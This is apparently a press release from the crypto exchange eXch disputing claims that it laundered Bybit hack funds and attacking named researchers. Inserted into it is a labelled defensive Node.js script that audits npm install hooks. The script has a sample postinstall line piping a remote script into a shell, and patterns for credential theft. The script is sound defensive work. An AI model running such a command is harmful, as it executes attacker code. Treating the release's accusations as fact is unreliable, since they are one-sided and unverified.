PRESS RELEASE
eXch official comments on the recent events
- On Decrypt and ethical journalism

We would like to extend our gratitude to Decrypt.co and the other media outlets who interviewed us, not only for not relying on Twitter posts as credible information but also for seeking insights from sources outside of Twitter, unlike some other media companies. This highlights a concerning trend within the crypto media landscape, where random Twitter posts are often treated as credible sources of information. Good journalism is about high standards of source verification.
- On the Bybit hack

The recent Bybit hack, like previous incidents of this nature, underscores a significant lack of a well-trained workforce within the cryptocurrency security sector. If a billion-dollar exchange can lose such a substantial amount of money due to rookie smart contract deployments, it raises serious questions about the overall security practices in the industry.
The Ethereum developer ecosystem has long been one of the worst due to its preference for languages like Node.js, which allow for easy intrusion into developer machines through malicious NPM packages. A recent incident involving North Korean Lazarus hackers demonstrates this vulnerability, as they successfully infected hundreds of systems via compromised NPM packages (https://www.bleepingcomputer.com/news/security/north-korean-lazarus-hackers-infect-hundreds-via-npm-packages/). This is precisely how the machine of the developer of Safe Wallet (who hopefully will consider renaming its brand) was hacked, permitting ByBit's smart contracts to be altered afterwards. What is even more concerning is the continued negligence among developers who ignore the security threats associated with their chosen languages. Many still mindlessly execute `npm install` on every random repository they download from GitHub, exposing themselves and their projects to significant risks.
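As an added illustration of the `npm install` risk described above (this is not eXch's code and not part of the press release), the Node.js script below audits a dependency tree for install-time lifecycle scripts before they are allowed to run. npm executes `preinstall`, `install`, `postinstall` and (for some dependency kinds) `prepare` automatically during installation, which is the hook a malicious package uses to run code on the developer machine. The package manifests are constructed sample data and the suspicious-command patterns are a heuristic assumption, not an npm feature.

```javascript
// Added example: audit npm package manifests for install-time lifecycle hooks
// before running `npm install`. Not eXch's code; sample data is constructed.

// Lifecycle scripts that npm runs without any explicit user action.
const INSTALL_HOOKS = ["preinstall", "install", "postinstall", "preprepare", "prepare", "postprepare"];

// Heuristic patterns (assumption for this example) that make a hook command
// look like a dropper rather than a legitimate native build step.
const SUSPICIOUS_PATTERNS = [
  { name: "remote-fetch", re: /\b(curl|wget|Invoke-WebRequest|fetch\()/i },
  { name: "shell-pipe", re: /\|\s*(sh|bash|node)\b/ },
  { name: "eval-or-decode", re: /\b(eval\(|Function\(|atob\(|Buffer\.from\([^)]*base64)/ },
  { name: "env-exfil", re: /\$\{?[A-Z_]*(TOKEN|SECRET|KEY|PASSWORD)/ },
  { name: "home-dir-access", re: /(~\/\.|\$HOME|\.ssh|\.npmrc|\.aws)/ },
];

// Return one finding per install-time hook declared by a single package.
function auditManifest(name, manifest) {
  const scripts = manifest.scripts || {};
  const findings = [];
  for (const hook of INSTALL_HOOKS) {
    if (typeof scripts[hook] !== "string") continue;
    const command = scripts[hook];
    const flags = SUSPICIOUS_PATTERNS.filter((p) => p.re.test(command)).map((p) => p.name);
    findings.push({
      package: name,
      hook,
      command,
      flags,
      // Any hook deserves a human look; a hook matching a pattern is high severity.
      severity: flags.length > 0 ? "high" : "review",
    });
  }
  return findings;
}

// Audit every package in a resolved tree (name -> manifest object).
function auditTree(tree) {
  const findings = [];
  for (const [name, manifest] of Object.entries(tree)) {
    findings.push(...auditManifest(name, manifest));
  }
  return findings;
}

// Policy: block the install on any high finding, require review on any hook,
// otherwise allow. Callers can then run `npm install --ignore-scripts` instead.
function decide(findings) {
  if (findings.some((f) => f.severity === "high")) return "block";
  if (findings.length > 0) return "review";
  return "allow";
}

// Constructed sample tree standing in for what a lockfile would resolve.
const SAMPLE_TREE = {
  "left-padder": { version: "1.0.0", scripts: { test: "node test.js" } },
  "native-addon": { version: "2.3.1", scripts: { install: "node-gyp rebuild" } },
  "evil-helper": { version: "0.0.9", scripts: { postinstall: "curl -s https://example.invalid/x.sh | sh" } },
};

const sampleFindings = auditTree(SAMPLE_TREE);
for (const f of sampleFindings) {
  console.log(`[${f.severity}] ${f.package} ${f.hook}: ${f.command}` + (f.flags.length ? ` (${f.flags.join(", ")})` : ""));
}
console.log("decision:", decide(sampleFindings));
```

On the sample tree this reports `native-addon` for review (a native build step is expected to have an `install` hook) and blocks on `evil-helper`, whose `postinstall` pipes a remote script into a shell. The practical mitigation the script points at is real npm behaviour: `npm install --ignore-scripts`, or `npm config set ignore-scripts true` globally, installs packages without running any lifecycle hook, so the few packages that genuinely need a build step can be rebuilt deliberately afterwards.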
Now ByBit desperately offers a total of $140M in rewards to people who help recover the stolen funds, while with such a large amount you could afford a few well-trained CISOs from outside the crypto industry (since inside it, it is hard to find somebody competent) to make sure you would not lose money this way anymore. Their campaign's website also lists misinformation about eXch on purpose, which proves that ByBit was always hostile to eXch.
- On ZachXBT's tasseographic blockchain analysis

Given Zach's apparent lack of professional education and training in practical information security, it is unsurprising that he and other amateur, anonymous and pseudonymous researchers, who rely solely on their Twitter presence, often make mistakes in their superficial blockchain analyses. Experts from eXch, with professional backgrounds in both blockchain analysis and information security, have conducted their own research into the ByBit exploiter's funds flow, focusing on a specific batch of ~10000 ETH, and have uncovered the reasons behind the erroneous allegations of eXch's involvement outside its official Ethereum address.
Our investigation revealed a relatively new Bitcoin privacy service that advertises exclusively on Tor-only forums and uses Thorchain to process user funds. The transactions from this service closely resemble our rebalance operations through Thorchain, leading to confusion because of shared parameters: both default to a very old, customized version of ThorSwapKit that its developer dropped into their Discord chat at the request of a few users, and which we also started to use back then (this version uses the parameters from when the software was in an experimental development stage and is not available anymore). The ByBit exploiter's funds were diverted to a wide variety of bridges, centralized and decentralized exchanges and mixers in an extremely short time frame, and given that some mixers use eXch as one of their backends, this explains how some funds ended up in our mixed pool later. Zach relies on his favored timing analysis technique, which compares sets of blockchains to identify similar amounts and transactions, making it a form of fortune-telling. This is why he and others mistakenly attributed some of the ByBit exploiter's transactions to eXch in hopes of gaining financial merit from ByBit, neglecting deeper research. That is typical for this kind of researcher and is also the reason why we always call them amateurs.
The name-calling and marginal behaviors exhibited by certain "researchers" on Twitter raise significant concerns about their professionalism and competence. It is troubling to observe that even in the event of a mistake regarding eXch, which was confused with another service, they gloat in such a manner. One must wonder how they would react if eXch were genuinely placed in a vulnerable position. Interestingly, when FixedFloat or ByBit experienced losses due to rookie mistakes, they were not subjected to ridicule or called "clowns." However, it is clear that if eXch were to face a similar situation, these individuals would undoubtedly revel in the opportunity to gloat, driven by their apparent animosity towards us.
As Zach has previously stated, "I will make sure to use all my influence to destroy you," a sentiment he has expressed regarding others in the past, we will utilize our knowledge and professionalism to deflect all cheap provocations and false allegations directed at us.
Right to the point, it's absurd how these wannabe-researchers allow the proliferation of eXch's phishing domains while doing absolutely nothing to address the issue. This inaction logically suggests a lack of capability or willingness to effectively manage their responsibilities in the realm of cybersecurity.
- On reception of eXch in the whitehat and establishment communities (and on conspiracy and malicious acts committed against eXch's infrastructure in attempts to claim the Lazarus Bounty reward)
When eXch was established, our objective was to provide a balanced solution that bridged the gap between mixers and government-regulated entities like compliant centralized exchanges (CEX). We anticipated that our approach would be appreciated, as we are neither a mixer nor a CEX that disregards user privacy. However, recent circumstances have proven that many in the whitehat community have acted with hostility towards us.
Despite our previous engagement with them, we have been met with a series of aggressive actions that raise serious concerns about their ethical standards. These include DDoS attacks on our platform, unauthorized penetration testing (SQL injection, XSS, port scanning and service exploitation attempts), and takeover efforts from individuals claiming to be whitehats*.
1. We have faced server takeover attempts from individuals identifying as whitehats** who leverage their connections within hosting companies to undermine our operations. A notable incident involved the submission of what appears to be a fraudulent subpoena to OVH, or simply a friend working there, making OVH dump the hard disk from one of our frontend servers. This led to OVH shutting down the server, pulling out the disk and dumping its contents, all within approximately one hour, before switching the server back online, according to what we were later able to observe in the BMC's IPMI SEL logs of hardware events, which they forgot to clear.
This happened on the second day after ByBit announced their bounty reward. If this action was not government-authorized, it constitutes illegal unauthorized access, use, disclosure, disruption, modification or destruction of our property, which is prosecutable under multiple federal laws. It was a pathetic and failed attempt to disrupt our service by people naively thinking our core infrastructure is located there, so that they could steal coins from us and share ByBit's reward.
2. A few days later, we received a few emails from Cloudflare reporting multiple takeover attempts on our Cloudflare account, involving sophisticated social engineering techniques to try to convince Cloudflare to hand over the credentials, which were successfully identified and prevented by Cloudflare; many thanks to their security team. Here is one of them:

3. For two weeks and up to this date, we have been experiencing a high volume of automated penetration testing attempts directed at our website, made to look as if they come from the popular automated vulnerability testing kits that amateur hackers use. This makes it obvious to us that it is the whitehat circle attempting to disrupt us in hopes of getting ByBit's reward.
Given these experiences, we can no longer afford to be "nice" to those who have shown us such blatant disrespect. Our previous efforts to maintain a balanced relationship with the whitehat community have yielded nothing but demotivation and hostility. As a result, we will now act according to our own interests without attempting to appease those who have proven themselves unworthy of our attention and consideration. We had initially believed that the whitehat community would appreciate our commitment to privacy and blockchain security; however, the actions of certain individuals have revealed a darker side, where the line between whitehat and blackhat behavior becomes blurred. These individuals exploit their influence to shield themselves from scrutiny, allowing them to engage in malpractice without fear of accountability.
In light of these developments, we are committed to moving forward with our mission, focusing on our goals and the integrity of our platform. We will continue to uphold our standards of professionalism and ethical conduct, while remaining vigilant against those who seek to undermine our efforts.
* When we refer to "whitehats," you may already be familiar with some of their names, as they have been mentioned multiple times in this thread. However, there are additional names not previously mentioned, such as Nick Bax (aka @bax1337, where "1337" is a self-proclamation of being a "1337h4x0r", just like many others of these false Messiahs).
** These individuals often refer to themselves as "ethical hackers", and what they actually do to us makes them the complete opposite.

- On money laundering allegations and the Chinese cryptocurrency exchange mafia

According to the aforementioned whitehats, it appears acceptable for major players to launder money, as evidenced by the earlier multiple cases in which OKX, Huobi and ByBit laundered money from hacks. They conveniently ignore such news, yet when non-KYC platforms like eXch process even a small amount of dark funds, they suddenly adopt a dubious moral high ground and start their witch hunt on platforms like ours.
https://hacked.slowmist.io (<--- a free advertisement for the one-man company that hates eXch most) lists a lot of past events where hacked funds can be traced, in amounts of millions, to many large CEXs, yet their addresses were never given "community notes" by Etherscan. On the other hand, Etherscan, being part of their mafia, of course aims to attack our reputation by putting cheap "community notes" on our address, but never on the addresses of those who feed them, even when those addresses process far more shady funds than could ever be compared to us.
- On community and some major players' support

We extend our gratitude to those who have supported eXch throughout this challenging period, including Binance and Coinbase, who have remained steadfast in their commitment to our service despite the ongoing defamation campaign against us.
- On what's next

With all these events, we will have to take a lot of countermeasures to make sure our operations are not affected and to protect our company. There will be some significant changes in regard to how our service operates, which obviously will not affect our partners and users but will provide us with some extra protection. Some of them were already mentioned in some posts here; others were not and will be announced in the next posts.